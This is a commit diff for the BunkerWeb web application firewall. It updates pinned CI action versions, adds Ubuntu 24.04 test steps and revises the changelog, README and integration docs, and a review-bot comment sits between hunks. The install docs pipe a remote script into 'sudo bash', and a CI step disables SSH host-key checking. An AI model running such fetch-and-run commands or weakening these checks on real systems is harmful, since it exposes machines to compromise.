Merge branch 'dev' into ui

This commit is contained in:
Jordan Blasenhauer 2024-05-14 09:20:40 +02:00
commit 31d7ebfd24
661 changed files with 4896 additions and 125882 deletions


@ -135,7 +135,7 @@ jobs:
versionrpm: ${{ steps.getversionrpm.outputs.versionrpm }}
steps:
- name: Checkout source code
uses: actions/checkout@0ad4b8fadaa221de15dcec353f45205ec38ea70b # v4.1.4
uses: actions/checkout@44c2b7a8a4ea60a981eaca3cf939b5f4305c123b # v4.1.5
- name: Get VERSION
id: getversion
run: echo "version=$(cat src/VERSION | tr -d '\n')" >> "$GITHUB_OUTPUT"


@ -19,7 +19,7 @@ jobs:
language: ["python", "javascript"]
steps:
- name: Checkout repository
uses: actions/checkout@0ad4b8fadaa221de15dcec353f45205ec38ea70b # v4.1.4
uses: actions/checkout@44c2b7a8a4ea60a981eaca3cf939b5f4305c123b # v4.1.5
- name: Set up Python 3.9
uses: actions/setup-python@82c7e631bb3cdc910f68e0081d67478d79c6982d # v5.1.0
if: matrix.language == 'python'
@ -35,12 +35,12 @@ jobs:
python -m pip install --no-cache-dir --require-hashes -r src/common/db/requirements.txt
echo "CODEQL_PYTHON=$(which python)" >> $GITHUB_ENV
- name: Initialize CodeQL
uses: github/codeql-action/init@d39d31e687223d841ef683f52467bd88e9b21c14 # v3.25.3
uses: github/codeql-action/init@ccf74c947955fd1cf117aef6a0e4e66191ef6f61 # v3.25.4
with:
languages: ${{ matrix.language }}
config-file: ./.github/codeql.yml
setup-python-dependencies: false
- name: Perform CodeQL Analysis
uses: github/codeql-action/analyze@d39d31e687223d841ef683f52467bd88e9b21c14 # v3.25.3
uses: github/codeql-action/analyze@ccf74c947955fd1cf117aef6a0e4e66191ef6f61 # v3.25.4
with:
category: "/language:${{matrix.language}}"


@ -45,7 +45,7 @@ jobs:
steps:
# Prepare
- name: Checkout source code
uses: actions/checkout@0ad4b8fadaa221de15dcec353f45205ec38ea70b # v4.1.4
uses: actions/checkout@44c2b7a8a4ea60a981eaca3cf939b5f4305c123b # v4.1.5
- name: Replace VERSION
if: inputs.RELEASE == 'testing' || inputs.RELEASE == 'dev'
run: ./misc/update-version.sh ${{ inputs.RELEASE }}
@ -117,7 +117,7 @@ jobs:
# Check OS vulnerabilities
- name: Check OS vulnerabilities
if: ${{ inputs.CACHE_SUFFIX != 'arm' }}
uses: aquasecurity/trivy-action@d710430a6722f083d3b36b8339ff66b32f22ee55 # v0.19.0
uses: aquasecurity/trivy-action@b2933f565dbc598b29947660e66259e3c7bc8561 # v0.20.0
with:
vuln-type: os
skip-dirs: /root/.cargo


@ -33,7 +33,7 @@ jobs:
steps:
# Prepare
- name: Checkout source code
uses: actions/checkout@0ad4b8fadaa221de15dcec353f45205ec38ea70b # v4.1.4
uses: actions/checkout@44c2b7a8a4ea60a981eaca3cf939b5f4305c123b # v4.1.5
- name: Get ARM availabilities
id: availabilities
uses: scaleway/action-scw@be2696f261325a78354eda14988c80405f33e082
@ -66,7 +66,7 @@ jobs:
with:
args: instance server wait ${{ fromJson(steps.scw.outputs.json).ID }} zone=fr-par-2
- name: Wait for SSH
uses: iFaxity/wait-on-action@df89d0cf8089bb0c38e25279c74848ef313da53b
uses: iFaxity/wait-on-action@a7d13170ec542bdca4ef8ac4b15e9c6aa00a6866
with:
resource: tcp:${{ fromJson(steps.scw.outputs.json).public_ip.address }}:22
timeout: 300000


@ -12,7 +12,7 @@ jobs:
runs-on: ubuntu-latest
steps:
- name: Checkout source code
uses: actions/checkout@0ad4b8fadaa221de15dcec353f45205ec38ea70b # v4.1.4
uses: actions/checkout@44c2b7a8a4ea60a981eaca3cf939b5f4305c123b # v4.1.5
with:
fetch-depth: 0
token: ${{ secrets.BUNKERBOT_TOKEN }}


@ -80,7 +80,7 @@ jobs:
runs-on: ubuntu-latest
steps:
- name: Checkout repository
uses: actions/checkout@0ad4b8fadaa221de15dcec353f45205ec38ea70b # v4.1.4
uses: actions/checkout@44c2b7a8a4ea60a981eaca3cf939b5f4305c123b # v4.1.5
- id: set-matrix
run: |
tests=$(find ./tests/ui/ -name "*_page.py" -type f -printf "%f\n" | jq -c --raw-input --slurp 'split("\n")| .[0:-1]')
@ -113,7 +113,7 @@ jobs:
runs-on: ubuntu-latest
steps:
- name: Checkout repository
uses: actions/checkout@0ad4b8fadaa221de15dcec353f45205ec38ea70b # v4.1.4
uses: actions/checkout@44c2b7a8a4ea60a981eaca3cf939b5f4305c123b # v4.1.5
- id: set-matrix
run: |
tests=$(find ./tests/core/ -maxdepth 1 -mindepth 1 -type d -printf "%f\n" | jq -c --raw-input --slurp 'split("\n")| .[0:-1]')


@ -13,7 +13,7 @@ jobs:
steps:
# Prepare
- name: Checkout source code
uses: actions/checkout@0ad4b8fadaa221de15dcec353f45205ec38ea70b # v4.1.4
uses: actions/checkout@44c2b7a8a4ea60a981eaca3cf939b5f4305c123b # v4.1.5
- name: Install Python
uses: actions/setup-python@82c7e631bb3cdc910f68e0081d67478d79c6982d # v5.1.0
with:


@ -37,7 +37,7 @@ jobs:
steps:
# Prepare
- name: Checkout source code
uses: actions/checkout@0ad4b8fadaa221de15dcec353f45205ec38ea70b # v4.1.4
uses: actions/checkout@44c2b7a8a4ea60a981eaca3cf939b5f4305c123b # v4.1.5
- name: Replace VERSION
if: inputs.RELEASE == 'testing' || inputs.RELEASE == 'dev' || inputs.RELEASE == 'ui'
run: ./misc/update-version.sh ${{ inputs.RELEASE }}


@ -18,7 +18,7 @@ jobs:
runs-on: ubuntu-latest
steps:
- name: Checkout source code
uses: actions/checkout@0ad4b8fadaa221de15dcec353f45205ec38ea70b # v4.1.4
uses: actions/checkout@44c2b7a8a4ea60a981eaca3cf939b5f4305c123b # v4.1.5
with:
fetch-depth: 0
token: ${{ secrets.BUNKERBOT_TOKEN }}


@ -33,7 +33,7 @@ jobs:
steps:
# Prepare
- name: Check out repository code
uses: actions/checkout@0ad4b8fadaa221de15dcec353f45205ec38ea70b # v4.1.4
uses: actions/checkout@44c2b7a8a4ea60a981eaca3cf939b5f4305c123b # v4.1.5
- name: Login to Docker Hub
uses: docker/login-action@e92390c5fb421da1463c202d546fed0ec5c39f20 # v3.1.0
with:


@ -15,7 +15,7 @@ jobs:
runs-on: ubuntu-latest
steps:
# Checkout
- uses: actions/checkout@0ad4b8fadaa221de15dcec353f45205ec38ea70b # v4.1.4
- uses: actions/checkout@44c2b7a8a4ea60a981eaca3cf939b5f4305c123b # v4.1.5
# Get PDF doc
- name: Get documentation
if: inputs.VERSION != 'testing'
@ -51,7 +51,7 @@ jobs:
# Create release
- name: Create release
if: inputs.VERSION != 'testing'
uses: softprops/action-gh-release@9d7c94cfd0a1f3ed45544c887983e9fa900f0564 # v2.0.4
uses: softprops/action-gh-release@69320dbe05506a9a39fc8ae11030b214ec2d1f87 # v2.0.5
with:
body: |
Documentation : https://docs.bunkerweb.io/${{ inputs.VERSION }}/
@ -75,7 +75,7 @@ jobs:
# Create release
- name: Create release
if: inputs.VERSION == 'testing'
uses: softprops/action-gh-release@9d7c94cfd0a1f3ed45544c887983e9fa900f0564 # v2.0.4
uses: softprops/action-gh-release@69320dbe05506a9a39fc8ae11030b214ec2d1f87 # v2.0.5
with:
body: |
**The testing version of BunkerWeb should not be used in production, please use the latest stable version instead.**


@ -40,9 +40,9 @@ jobs:
steps:
# Prepare
- name: Check out repository code
uses: actions/checkout@0ad4b8fadaa221de15dcec353f45205ec38ea70b # v4.1.4
uses: actions/checkout@44c2b7a8a4ea60a981eaca3cf939b5f4305c123b # v4.1.5
- name: Install ruby
uses: ruby/setup-ruby@1198b074305f9356bd56dd4b311757cc0dab2f1c # v1.175.1
uses: ruby/setup-ruby@cacc9f1c0b3f4eb8a16a6bb0ed10897b43b9de49 # v1.176.0
with:
ruby-version: "3.0"
- name: Install packagecloud


@ -143,7 +143,7 @@ jobs:
versionrpm: ${{ steps.getversionrpm.outputs.versionrpm }}
steps:
- name: Checkout source code
uses: actions/checkout@0ad4b8fadaa221de15dcec353f45205ec38ea70b # v4.1.4
uses: actions/checkout@44c2b7a8a4ea60a981eaca3cf939b5f4305c123b # v4.1.5
- name: Get VERSION
id: getversion
run: echo "version=$(cat src/VERSION | tr -d '\n')" >> "$GITHUB_OUTPUT"


@ -21,7 +21,7 @@ jobs:
steps:
# Prepare
- name: Checkout source code
uses: actions/checkout@0ad4b8fadaa221de15dcec353f45205ec38ea70b # v4.1.4
uses: actions/checkout@44c2b7a8a4ea60a981eaca3cf939b5f4305c123b # v4.1.5
- name: Delete ARM VM
uses: scaleway/action-scw@be2696f261325a78354eda14988c80405f33e082
with:


@ -15,16 +15,16 @@ jobs:
runs-on: ubuntu-latest
steps:
- name: "Checkout code"
uses: actions/checkout@0ad4b8fadaa221de15dcec353f45205ec38ea70b # v4.1.4
uses: actions/checkout@44c2b7a8a4ea60a981eaca3cf939b5f4305c123b # v4.1.5
with:
persist-credentials: false
- name: "Run analysis"
uses: ossf/scorecard-action@0864cf19026789058feabb7e87baa5f140aac736 # v2.3.1
uses: ossf/scorecard-action@dc50aa9510b46c811795eb24b2f1ba02a914e534 # v2.3.3
with:
results_file: results.sarif
results_format: sarif
publish_results: true
- name: "Upload SARIF results to code scanning"
uses: github/codeql-action/upload-sarif@d39d31e687223d841ef683f52467bd88e9b21c14 # v3.25.3
uses: github/codeql-action/upload-sarif@ccf74c947955fd1cf117aef6a0e4e66191ef6f61 # v3.25.4
with:
sarif_file: results.sarif


@ -21,9 +21,9 @@ jobs:
run: ssh-keygen -b 2048 -t rsa -f ~/.ssh/id_rsa -q -N "" && ssh-keygen -f ~/.ssh/id_rsa -y > ~/.ssh/id_rsa.pub && echo -e "Host *\n StrictHostKeyChecking no" > ~/.ssh/ssh_config
if: inputs.TYPE != 'k8s'
- name: Checkout source code
uses: actions/checkout@0ad4b8fadaa221de15dcec353f45205ec38ea70b # v4.1.4
uses: actions/checkout@44c2b7a8a4ea60a981eaca3cf939b5f4305c123b # v4.1.5
- name: Install terraform
uses: hashicorp/setup-terraform@97f030cf6dc0b4f5e0da352c7bca9cca34579800 # v3.1.0
uses: hashicorp/setup-terraform@651471c36a6092792c552e8b1bef71e592b462d8 # v3.1.1
- name: Install kubectl
uses: azure/setup-kubectl@3e0aec4d80787158d308d7b364cb1b702e7feb7f # v4.0.0
if: inputs.TYPE == 'k8s'


@ -20,9 +20,9 @@ jobs:
steps:
# Prepare
- name: Checkout source code
uses: actions/checkout@0ad4b8fadaa221de15dcec353f45205ec38ea70b # v4.1.4
uses: actions/checkout@44c2b7a8a4ea60a981eaca3cf939b5f4305c123b # v4.1.5
- name: Install terraform
uses: hashicorp/setup-terraform@97f030cf6dc0b4f5e0da352c7bca9cca34579800 # v3.1.0
uses: hashicorp/setup-terraform@651471c36a6092792c552e8b1bef71e592b462d8 # v3.1.1
- uses: actions/download-artifact@65a9edc5881444af0b9093a5e628f2fe47ea3b2e # v4.1.7
with:
name: tf-${{ inputs.TYPE }}


@ -25,7 +25,7 @@ jobs:
steps:
# Prepare
- name: Checkout source code
uses: actions/checkout@0ad4b8fadaa221de15dcec353f45205ec38ea70b # v4.1.4
uses: actions/checkout@44c2b7a8a4ea60a981eaca3cf939b5f4305c123b # v4.1.5
- name: Login to ghcr
uses: docker/login-action@e92390c5fb421da1463c202d546fed0ec5c39f20 # v3.1.0
with:
@ -75,6 +75,9 @@ jobs:
- name: Pull BW linux ubuntu test image
if: inputs.TYPE == 'linux'
run: docker pull ghcr.io/bunkerity/ubuntu-tests:testing && docker tag ghcr.io/bunkerity/ubuntu-tests:testing local/ubuntu:latest
- name: Pull BW linux ubuntu noble test image
if: inputs.TYPE == 'linux'
run: docker pull ghcr.io/bunkerity/ubuntu-noble-tests:testing && docker tag ghcr.io/bunkerity/ubuntu-noble-tests:testing local/ubuntu-noble:latest
- name: Pull BW linux debian test image
if: inputs.TYPE == 'linux'
run: docker pull ghcr.io/bunkerity/debian-tests:testing && docker tag ghcr.io/bunkerity/debian-tests:testing local/debian:latest
@ -121,6 +124,12 @@ jobs:
env:
TEST_DOMAINS: ${{ secrets.TEST_DOMAINS_LINUX }}
ROOT_DOMAIN: ${{ secrets.ROOT_DOMAIN }}
- name: Run Linux ubuntu noble tests
if: inputs.TYPE == 'linux'
run: export $(echo "$TEST_DOMAINS" | xargs) && ./tests/main.py "linux" "ubuntu-noble"
env:
TEST_DOMAINS: ${{ secrets.TEST_DOMAINS_LINUX }}
ROOT_DOMAIN: ${{ secrets.ROOT_DOMAIN }}
- name: Run Linux debian tests
if: inputs.TYPE == 'linux'
run: export $(echo "$TEST_DOMAINS" | xargs) && ./tests/main.py "linux" "debian"
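Review bot: The new "Pull BW linux ubuntu noble test image" step fetches `ghcr.io/bunkerity/ubuntu-noble-tests:testing` by a mutable tag, while every action in this workflow is pinned to a commit SHA, so the image actually exercised by the noble test run is whatever that tag resolves to at job time rather than a reviewable artifact. This mirrors the existing ubuntu and debian pull steps, so either pin all three by digest (`docker pull ghcr.io/bunkerity/ubuntu-noble-tests@sha256:<digest-placeholder>`) or record the intent with a comment such as `# :testing is rebuilt by the image pipeline; mutable by design` above the step. The added "Run Linux ubuntu noble tests" step also copies `export $(echo "$TEST_DOMAINS" | xargs)`, which word-splits a secret unquoted; it works only while the secret contains no spaces or glob characters, which is worth a comment if it is a deliberate format. Separately, the README and integrations.md hunks in this same commit still say automated tests are not yet run on Ubuntu 24.04; if this step is what now runs them, that sentence is stale and should be updated alongside.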


@ -91,7 +91,7 @@ jobs:
runs-on: ubuntu-latest
steps:
- name: Checkout repository
uses: actions/checkout@0ad4b8fadaa221de15dcec353f45205ec38ea70b # v4.1.4
uses: actions/checkout@44c2b7a8a4ea60a981eaca3cf939b5f4305c123b # v4.1.5
- id: set-matrix
run: |
tests=$(find ./tests/core/ -maxdepth 1 -mindepth 1 -type d -printf "%f\n" | jq -c --raw-input --slurp 'split("\n")| .[0:-1]')
@ -102,7 +102,7 @@ jobs:
runs-on: ubuntu-latest
steps:
- name: Checkout repository
uses: actions/checkout@0ad4b8fadaa221de15dcec353f45205ec38ea70b # v4.1.4
uses: actions/checkout@44c2b7a8a4ea60a981eaca3cf939b5f4305c123b # v4.1.5
- id: set-matrix
run: |
tests=$(find ./tests/ui/ -name "*_page.py" -type f -printf "%f\n" | jq -c --raw-input --slurp 'split("\n")| .[0:-1]')


@ -16,7 +16,7 @@ jobs:
steps:
# Prepare
- name: Checkout source code
uses: actions/checkout@0ad4b8fadaa221de15dcec353f45205ec38ea70b # v4.1.4
uses: actions/checkout@44c2b7a8a4ea60a981eaca3cf939b5f4305c123b # v4.1.5
- name: Set up Python 3.9
uses: actions/setup-python@82c7e631bb3cdc910f68e0081d67478d79c6982d # v5.1.0
with:


@ -16,7 +16,7 @@ jobs:
steps:
# Prepare
- name: Checkout source code
uses: actions/checkout@0ad4b8fadaa221de15dcec353f45205ec38ea70b # v4.1.4
uses: actions/checkout@44c2b7a8a4ea60a981eaca3cf939b5f4305c123b # v4.1.5
- name: Login to ghcr
uses: docker/login-action@e92390c5fb421da1463c202d546fed0ec5c39f20 # v3.1.0
with:


@ -16,7 +16,7 @@ jobs:
steps:
# Prepare
- name: Checkout source code
uses: actions/checkout@0ad4b8fadaa221de15dcec353f45205ec38ea70b # v4.1.4
uses: actions/checkout@44c2b7a8a4ea60a981eaca3cf939b5f4305c123b # v4.1.5
- name: Set up Python 3.9
uses: actions/setup-python@82c7e631bb3cdc910f68e0081d67478d79c6982d # v5.1.0
with:


@ -15,7 +15,7 @@ jobs:
steps:
# Prepare
- name: Checkout source code
uses: actions/checkout@0ad4b8fadaa221de15dcec353f45205ec38ea70b # v4.1.4
uses: actions/checkout@44c2b7a8a4ea60a981eaca3cf939b5f4305c123b # v4.1.5
- name: Login to ghcr
uses: docker/login-action@e92390c5fb421da1463c202d546fed0ec5c39f20 # v3.1.0
with:


@ -67,7 +67,7 @@ jobs:
runs-on: ubuntu-latest
steps:
- name: Checkout repository
uses: actions/checkout@0ad4b8fadaa221de15dcec353f45205ec38ea70b # v4.1.4
uses: actions/checkout@44c2b7a8a4ea60a981eaca3cf939b5f4305c123b # v4.1.5
- id: set-matrix
run: |
tests=$(find ./tests/ui/ -name "*_page.py" -type f -printf "%f\n" | jq -c --raw-input --slurp 'split("\n")| .[0:-1]')


@ -2,11 +2,15 @@
## v1.5.7 - ????/??/??
- [LINUX] Support Ubuntu 24.04 (Noble)
- [LINUX] Support RHEL 9.4 instead of 9.3
- [LINUX] Support hot reload with systemctl reload
- [BUGFIX] Fix rare error when the cache is not properly initialized and jobs are executed
- [BUGFIX] Fix bug when downloading new mmdb files
- [BUGFIX] Remove potential false positives with ModSecurity on the jobs page of the web UI
- [BUGFIX] Fix bwcli not working with Redis sentinel
- [BUGFIX] Fix potential issues when removing the bunkerweb Linux package
- [BUGFIX] Fix bug when antibot is enabled and User-Agent or IP address has changed
- [FEATURE] Add backup plugin to backup and restore easily the database
- [FEATURE] Add LETS_ENCRYPT_CLEAR_OLD_CERTS setting to control if old certificates should be removed when generating Let's Encrypt certificates (default is no)
- [FEATURE] Add DISABLE_DEFAULT_SERVER_STRICT_SNI setting to allow/block requests when SNI is unknown or unset (default is no)
@ -14,16 +18,21 @@
- [UI] General : fix select setting crop because of overflow and check if select is out of viewport to determine visible position
- [UI] General : show logs on UI when pre rendering issue
- [UI] General : Improve UI performance by using multiple workers for the web server and reducing the number of times we prompt a loading page
- [UI] General : handle word breaks on dynamic text content
- [UI] General : fix overflow issue with tables on Safari
- [UI] General : fix static resources issue with firefox leading to loop requests
- [UI] Global config : fix script error while fragment relate to a missing plugin
- [UI] Global config / services page : filtering settings now open plugin select to highlight remaining plugin
- [UI] Global config / services page : add combobox on plugin select open to search a plugin quick
- [UI] Global config / services page : add combobox on plugin select open to search a plugin quick
- [UI] Global config / services page : add order for settings to always respect the order defined in the plugin
- [UI] Services page : show any invalid setting value on setting modal and disabled save if case
- [UI] Reporting page : fix missing data and add new ones
- [UI] Account page : keep license key form even if pro register to easy update
- [UI] Wizard : Add the possibility to still configure reverse proxy even if an admin user already exists
- [AUTOCONF] Speedup autoconf process when we have multiple events in short period of time
- [DOCUMENTATION] Add upgrade procedure for 1.5.7+
- [DOCUMENTATION] Rename Migrating section to Upgrading
- [MISC] Drop support of ansible and vagrant integrations
- [MISC] Support custom bwcli commands using plugins
- [MISC] Add Docker labels in autoconf, bw, scheduler, and ui Dockerfiles
- [DEPS] Update Python base Docker image to version 3.12.3-alpine3.19


@ -35,6 +35,8 @@
⚙️ <a href="https://config.bunkerweb.io/?utm_campaign=self&utm_source=github">Configurator</a>
&#124;
🗺️ <a href="https://threatmap.bunkerweb.io/?utm_campaign=self&utm_source=github">Threatmap</a>
&#124;
🔎 <a href="https://forms.gle/e3VgymAteYPnwM1j9">Feedbacks</a>
</p>
> 🛡️ Make security by default great again !
@ -141,12 +143,11 @@ The first concept is the integration of BunkerWeb into the target environment. W
The following integrations are officially supported :
- [Docker](https://docs.bunkerweb.io/1.5.7/integrations/?utm_campaign=self&utm_source=github#docker)
- [Docker autoconf](https://docs.bunkerweb.io/1.5.7/integrations/?utm_campaign=self&utm_source=github#docker-autoconf)
- [Swarm](https://docs.bunkerweb.io/1.5.7/integrations/?utm_campaign=self&utm_source=github#swarm)
- [Kubernetes](https://docs.bunkerweb.io/1.5.7/integrations/?utm_campaign=self&utm_source=github#kubernetes)
- [Linux](https://docs.bunkerweb.io/1.5.7/integrations/?utm_campaign=self&utm_source=github#linux)
- [Ansible](https://docs.bunkerweb.io/1.5.7/integrations/?utm_campaign=self&utm_source=github#ansible)
- [Vagrant](https://docs.bunkerweb.io/1.5.7/integrations/?utm_campaign=self&utm_source=github#vagrant)
- [Docker autoconf](https://docs.bunkerweb.io/1.5.7/integrations/?utm_campaign=self&utm_source=github#docker-autoconf)
- [Kubernetes](https://docs.bunkerweb.io/1.5.7/integrations/?utm_campaign=self&utm_source=github#kubernetes)
- [Swarm](https://docs.bunkerweb.io/1.5.7/integrations/?utm_campaign=self&utm_source=github#swarm)
- [Microsoft Azure](https://docs.bunkerweb.io/1.5.7/integrations/?utm_campaign=self&utm_source=github#microsoft-azure)
## Settings
@ -276,7 +277,7 @@ List of supported Linux distros :
- Ubuntu 24.04 "Noble"
- Fedora 39
- RHEL 8.9
- RHEL 9.3
- RHEL 9.4
Repositories of Linux packages for BunkerWeb are available on [PackageCloud](https://packagecloud.io/bunkerity/bunkerweb), they provide a bash script to automatically add and trust the repository (but you can also follow the [manual installation](https://packagecloud.io/bunkerity/bunkerweb/install) instructions if you prefer).
@ -285,35 +286,15 @@ You will find more information in the [Linux section](https://docs.bunkerweb.io/
> [!IMPORTANT]
> As of Ubuntu 24.04, the `nginx` package is not available in the official repository. You will need to use the `jammy` repository to install NGINX 1.24.0. Also we do not yet run automated tests on Ubuntu 24.04, so please consider this version as experimental.
## Ansible
## Microsoft Azure
<p align="center">
<img alt="Ansible banner" src="https://github.com/bunkerity/bunkerweb/raw/v1.5.7/docs/assets/img/integration-ansible.svg" />
<img alt="Azure banner" src="https://github.com/bunkerity/bunkerweb/raw/v1.5.7/docs/assets/img/integration-azure.webp" />
</p>
List of supported Linux distros :
BunkerWeb is referenced in the [Azure Marketplace](https://azuremarketplace.microsoft.com/fr-fr/marketplace/apps/bunkerity.bunkerweb?tab=Overview) and a ARM template is available in the [misc folder](https://github.com/bunkerity/bunkerweb/raw/v1.5.7/misc/integrations/azure-arm-template.json).
- Debian 12 "Bookworm"
- Ubuntu 22.04 "Jammy"
- Ubuntu 24.04 "Noble"
- Fedora 39
- RHEL 8.9
- RHEL 9.3
[Ansible](https://www.ansible.com/) is an IT automation tool. It can configure systems, deploy software, and orchestrate more advanced IT tasks such as continuous deployments or zero downtime rolling updates.
A specific BunkerWeb Ansible role is available on [Ansible Galaxy](https://galaxy.ansible.com/bunkerity/bunkerweb) (source code is available [here](https://github.com/bunkerity/bunkerweb-ansible)).
You will find more information in the [Ansible section](https://docs.bunkerweb.io/1.5.7/integrations/?utm_campaign=self&utm_source=github#ansible) of the documentation.
## Vagrant
We maintain ready to use Vagrant boxes hosted on Vagrant cloud for the following providers :
- virtualbox
- libvirt
You will find more information in the [Vagrant section](https://docs.bunkerweb.io/1.5.7/integrations/?utm_campaign=self&utm_source=github#vagrant) of the documentation.
You will find more information in the [Microsoft Azure section](https://docs.bunkerweb.io/1.5.7/integrations/?utm_campaign=self&utm_source=github#microsoft-azure) of the documentation.
# Quickstart guide
@ -370,13 +351,13 @@ Here is the list of "official" plugins that we maintain (see the [bunkerweb-plug
| Name | Version | Description | Link |
| :------------: | :-----: | :------------------------------------------------------------------------------------------------------------------------------- | :-------------------------------------------------------------------------------------------------: |
| **ClamAV** | 1.4 | Automatically scans uploaded files with the ClamAV antivirus engine and denies the request when a file is detected as malicious. | [bunkerweb-plugins/clamav](https://github.com/bunkerity/bunkerweb-plugins/tree/main/clamav) |
| **Coraza** | 1.4 | Inspect requests using a the Coraza WAF (alternative of ModSecurity). | [bunkerweb-plugins/coraza](https://github.com/bunkerity/bunkerweb-plugins/tree/main/coraza) |
| **CrowdSec** | 1.4 | CrowdSec bouncer for BunkerWeb. | [bunkerweb-plugins/crowdsec](https://github.com/bunkerity/bunkerweb-plugins/tree/main/crowdsec) |
| **Discord** | 1.4 | Send security notifications to a Discord channel using a Webhook. | [bunkerweb-plugins/discord](https://github.com/bunkerity/bunkerweb-plugins/tree/main/discord) |
| **Slack** | 1.4 | Send security notifications to a Slack channel using a Webhook. | [bunkerweb-plugins/slack](https://github.com/bunkerity/bunkerweb-plugins/tree/main/slack) |
| **VirusTotal** | 1.4 | Automatically scans uploaded files with the VirusTotal API and denies the request when a file is detected as malicious. | [bunkerweb-plugins/virustotal](https://github.com/bunkerity/bunkerweb-plugins/tree/main/virustotal) |
| **WebHook** | 1.4 | Send security notifications to a custom HTTP endpoint using a Webhook. | [bunkerweb-plugins/slack](https://github.com/bunkerity/bunkerweb-plugins/tree/main/webhook) |
| **ClamAV** | 1.5 | Automatically scans uploaded files with the ClamAV antivirus engine and denies the request when a file is detected as malicious. | [bunkerweb-plugins/clamav](https://github.com/bunkerity/bunkerweb-plugins/tree/main/clamav) |
| **Coraza** | 1.5 | Inspect requests using a the Coraza WAF (alternative of ModSecurity). | [bunkerweb-plugins/coraza](https://github.com/bunkerity/bunkerweb-plugins/tree/main/coraza) |
| **CrowdSec** | 1.5 | CrowdSec bouncer for BunkerWeb. | [bunkerweb-plugins/crowdsec](https://github.com/bunkerity/bunkerweb-plugins/tree/main/crowdsec) |
| **Discord** | 1.5 | Send security notifications to a Discord channel using a Webhook. | [bunkerweb-plugins/discord](https://github.com/bunkerity/bunkerweb-plugins/tree/main/discord) |
| **Slack** | 1.5 | Send security notifications to a Slack channel using a Webhook. | [bunkerweb-plugins/slack](https://github.com/bunkerity/bunkerweb-plugins/tree/main/slack) |
| **VirusTotal** | 1.5 | Automatically scans uploaded files with the VirusTotal API and denies the request when a file is detected as malicious. | [bunkerweb-plugins/virustotal](https://github.com/bunkerity/bunkerweb-plugins/tree/main/virustotal) |
| **WebHook** | 1.5 | Send security notifications to a custom HTTP endpoint using a Webhook. | [bunkerweb-plugins/slack](https://github.com/bunkerity/bunkerweb-plugins/tree/main/webhook) |
You will find more information in the [plugins section](https://docs.bunkerweb.io/1.5.7/plugins/?utm_campaign=self&utm_source=github) of the documentation.

5
TODO

@ -1,5 +0,0 @@
- Ansible
- Vagrant
- Plugins
- Find a way to do rdns in background
- fix db warnings (Got an error reading communication packets)




@ -11,12 +11,10 @@ The first concept is the integration of BunkerWeb into the target environment. W
The following integrations are officially supported :
- [Docker](integrations.md#docker)
- [Docker autoconf](integrations.md#docker-autoconf)
- [Swarm](integrations.md#swarm)
- [Kubernetes](integrations.md#kubernetes)
- [Linux](integrations.md#linux)
- [Ansible](integrations.md#ansible)
- [Vagrant](integrations.md#vagrant)
- [Docker autoconf](integrations.md#docker-autoconf)
- [Kubernetes](integrations.md#kubernetes)
- [Swarm](integrations.md#swarm)
If you think that a new integration should be supported, do not hesitate to open a [new issue](https://github.com/bunkerity/bunkerweb/issues) on the GitHub repository.


@ -304,6 +304,222 @@ networks:
name: bw-docker
```
## Linux
<figure markdown>
![Overview](assets/img/integration-linux.svg){ align=center, width="600" }
<figcaption>Linux integration</figcaption>
</figure>
Supported Linux distributions for BunkerWeb (amd64/x86_64 and arm64/aarch64 architectures) include:
- Debian 12 "Bookworm"
- Ubuntu 22.04 "Jammy"
- Ubuntu 24.04 "Noble"
- Fedora 39
- Red Hat Enterprise Linux (RHEL) 8.9
- Red Hat Enterprise Linux (RHEL) 9.4
Please ensure that you have **NGINX 1.24.0 installed before installing BunkerWeb**. For all distributions, except Fedora, it is mandatory to use prebuilt packages from the [official NGINX repository](https://nginx.org/en/linux_packages.html). Compiling NGINX from source or using packages from different repositories will not work with the official prebuilt packages of BunkerWeb. However, you have the option to build BunkerWeb from source.
To simplify the installation process, Linux package repositories for BunkerWeb are available on [PackageCloud](https://packagecloud.io/bunkerity/bunkerweb). They provide a bash script that automatically adds and trusts the repository. You can follow the provided script for automatic setup, or opt for [manual installation](https://packagecloud.io/bunkerity/bunkerweb/install) instructions if you prefer.
=== "Debian"
The first step is to add NGINX official repository :
```shell
sudo apt install -y curl gnupg2 ca-certificates lsb-release debian-archive-keyring && \
curl https://nginx.org/keys/nginx_signing.key | gpg --dearmor \
| sudo tee /usr/share/keyrings/nginx-archive-keyring.gpg >/dev/null && \
echo "deb [signed-by=/usr/share/keyrings/nginx-archive-keyring.gpg] \
http://nginx.org/packages/debian `lsb_release -cs` nginx" \
| sudo tee /etc/apt/sources.list.d/nginx.list
```
You should now be able to install NGINX 1.24.0 :
```shell
sudo apt update && \
sudo apt install -y nginx=1.24.0-1~$(lsb_release -cs)
```
!!! warning "Testing/dev version"
If you use the `testing` or `dev` version, you will need to add the `force-bad-version` directive to your `/etc/dpkg/dpkg.cfg` file before installing BunkerWeb.
```shell
echo "force-bad-version" | sudo tee -a /etc/dpkg/dpkg.cfg
```
Optional step : if you want to automatically enable the [setup wizard](web-ui.md#setup-wizard) when BunkerWeb is installed, export the following variable :
```shell
export UI_WIZARD=1
```
And finally install BunkerWeb 1.5.7 :
```shell
curl -s https://packagecloud.io/install/repositories/bunkerity/bunkerweb/script.deb.sh | sudo bash && \
sudo apt update && \
sudo -E apt install -y bunkerweb=1.5.7
```
To prevent upgrading NGINX and/or BunkerWeb packages when executing `apt upgrade`, you can use the following command :
```shell
sudo apt-mark hold nginx bunkerweb
```
=== "Ubuntu"
!!! example "Specifications for Ubuntu 24.04"
As of Ubuntu 24.04, the `nginx` package is not available in the official repository. You will need to use the `jammy` repository to install NGINX 1.24.0.
Also we do not yet run automated tests on Ubuntu 24.04, so please consider this version as experimental.
The first step is to add NGINX official repository :
```shell
sudo apt install -y curl gnupg2 ca-certificates lsb-release ubuntu-keyring && \
curl https://nginx.org/keys/nginx_signing.key | gpg --dearmor \
| sudo tee /usr/share/keyrings/nginx-archive-keyring.gpg >/dev/null && \
echo "deb [signed-by=/usr/share/keyrings/nginx-archive-keyring.gpg] \
http://nginx.org/packages/ubuntu jammy nginx" \
| sudo tee /etc/apt/sources.list.d/nginx.list
```
You should now be able to install NGINX 1.24.0 :
```shell
sudo apt update && \
sudo apt install -y nginx=1.24.0-1~jammy
```
!!! warning "Testing/dev version"
If you use the `testing` or `dev` version, you will need to add the `force-bad-version` directive to your `/etc/dpkg/dpkg.cfg` file before installing BunkerWeb.
```shell
echo "force-bad-version" | sudo tee -a /etc/dpkg/dpkg.cfg
```
Optional step : if you want to automatically enable the [setup wizard](web-ui.md#setup-wizard) when BunkerWeb is installed, export the following variable :
```shell
export UI_WIZARD=1
```
